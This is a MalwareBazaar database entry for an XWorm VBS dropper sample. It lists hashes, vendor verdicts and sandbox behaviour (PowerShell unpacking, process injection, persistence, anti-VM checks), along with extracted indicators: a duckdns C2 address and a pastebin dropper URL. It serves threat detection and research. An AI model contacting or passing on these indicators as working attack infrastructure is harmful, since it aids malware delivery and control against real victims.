MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


XWorm


Vendor detections: 11


Intelligence 11 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
SHA3-384 hash: 79938044a67b1ab6a6c350d933d075e486a10f2a0b1725e92ac2c4d01e531b9330039a7707a0aca8013a838146e81e67
SHA1 hash: dae167b9d105e0a29dfb43d83540634819c41f0f
MD5 hash: b18fcb9a2af66c700b70cd9f9a58a563
humanhash: grey-double-robin-butter
File name:sostener.vbs
Download: download sample
Signature XWorm
Create hunting rule
File size:16'171'698 bytes
First seen:2024-10-03 04:51:19 UTC
Last seen:Never
File type:Visual Basic Script (vbs) vbs
MIME type:text/plain
ssdeep 384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
Threatray 1'508 similar samples on MalwareBazaar
TLSH T10DF6B434ED6E6447BD3F41EF3A616872C51B9B0612C24C3B292A504F4EBE6017EB1DE9
TrID 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1)
33.3% (.MP3) MP3 audio (1000/1)
Magika unknown
Reporter lontze7
Tags:vbs xworm

Intelligence

File Origin
# of uploads :
1
# of downloads :
120
Origin country :
FR FR
Vendor Threat Intelligence
Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=66fe92d20fdf88870979e1ed
Tags:
Dropper
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
powershell
Link:
https://www.filescan.io/uploads/66fe22f788188863f38e13e5/reports/fc0b1fc3-2513-47ec-bd05-12f517fc194c/overview
Verdict:
Malicious
Labled as:
GT:VB.Honolulu.1
Link:
https://www.hybrid-analysis.com/sample/06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
Result
Verdict:
MALICIOUS
Result
Threat name:
XWorm
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1524706
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected Powershell download and execute
Yara detected XWorm
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524706 Sample: sostener.vbs Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 54 toskaadmx.duckdns.org 2->54 56 pastebin.com 2->56 58 5 other IPs or domains 2->58 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 86 22 other signatures 2->86 10 wscript.exe 1 2->10         started        13 powershell.exe 11 2->13         started        signatures3 82 Uses dynamic DNS services 54->82 84 Connects to a pastebin service (likely for C&C) 56->84 process4 signatures5 94 Suspicious powershell command line found 10->94 96 Wscript starts Powershell (via cmd or directly) 10->96 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->98 100 Suspicious execution chain found 10->100 15 powershell.exe 7 10->15         started        102 Wscript called in batch mode (surpress errors) 13->102 18 wscript.exe 1 13->18         started        20 conhost.exe 1 13->20         started        process6 signatures7 104 Suspicious powershell command line found 15->104 106 Suspicious execution chain found 15->106 108 Found suspicious powershell code related to unpacking or dynamic code loading 15->108 110 Wscript called in batch mode (surpress errors) 15->110 22 powershell.exe 14 17 15->22         started        27 conhost.exe 15->27         started        112 Wscript starts Powershell (via cmd or directly) 18->112 29 powershell.exe 7 18->29         started        process8 dnsIp9 64 pastebin.com 104.20.4.235, 443, 49704, 49705 CLOUDFLARENETUS United States 22->64 66 paste.ee 188.114.96.3, 443, 49711, 49728 CLOUDFLARENETUS European Union 22->66 68 2 other IPs or domains 22->68 48 ___win____________...________-------.lnk, MS 22->48 dropped 88 Writes to foreign memory regions 22->88 90 Injects a PE file into a foreign processes 22->90 31 powershell.exe 13 22->31         started        34 RegAsm.exe 22->34         started        37 RegAsm.exe 2 22->37         started        92 Suspicious powershell command line found 29->92 40 powershell.exe 15 29->40         started        42 conhost.exe 29->42         started        file10 signatures11 process12 dnsIp13 50 C:\Users\...\sostener.vbs:Zone.Identifier, ASCII 31->50 dropped 52 C:\Users\user\AppData\Local\...\sostener.vbs, Unicode 31->52 dropped 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->70 60 toskaadmx.duckdns.org 46.246.14.3, 49712, 7000 PORTLANEwwwportlanecomSE Sweden 37->60 62 3.5.25.83, 443, 49724 AMAZON-AESUS United States 40->62 72 Writes to foreign memory regions 40->72 74 Injects a PE file into a foreign processes 40->74 44 powershell.exe 40->44         started        46 RegAsm.exe 40->46         started        file14 signatures15 process16
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d/
Threat name:
Script-WScript.Trojan.Honolulu
Create hunting rule
Status:
Malicious
First seen:
2024-10-03 04:52:07 UTC
File Type:
Binary
AV detection:
8 of 24 (33.33%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=a3vsqq3gwhu66dfv3xspqhuk3f2dodlmuhhw5gljvfzb5zng34wq._file
Verdict:
malicious
Label(s):
xworm
Create hunting rule
Similar samples:
39962cdef1efccb262b01e3bc41e4380ed1f925885f1a22178e505f5c440887a
XWorm
4ab223a4ed0eaced6dc3a2cc74953a453770bb030336f349cd37f2ef24b65c30
XWorm
4af6214cb055e4927edac5d42439c77c2c732c9a51b18bed148da55bd1d2387c
XWorm
528d569e3c55bab9d8d7908bb70e51efa1532eaae2ce097a7884b5bf5e239726
XWorm
604684d8a860ca44c0bb7a05797883b2dec1706667dd94b5e2448fbbf2cea622
XWorm
error
XWorm
f7a08ebdae40fcb8cdc61a569fdf42b9e65d2dd8f88a4cca9cae0e632a3d8f53
XWorm
+ 1'498 additional samples on MalwareBazaar
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:xworm discovery execution rat trojan
Link:
https://tria.ge/reports/241003-fhd64ayhkd/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops startup file
Blocklisted process makes network request
Detect Xworm Payload
Xworm
Malware Config
C2 Extraction:
toskaadmx.duckdns.org:7000
Dropper Extraction:
http://pastebin.com/raw/V9y5Q5vv
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

XWorm

Visual Basic Script (vbs) vbs 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d

(this sample)

  
Delivery method
Distributed via web download

Comments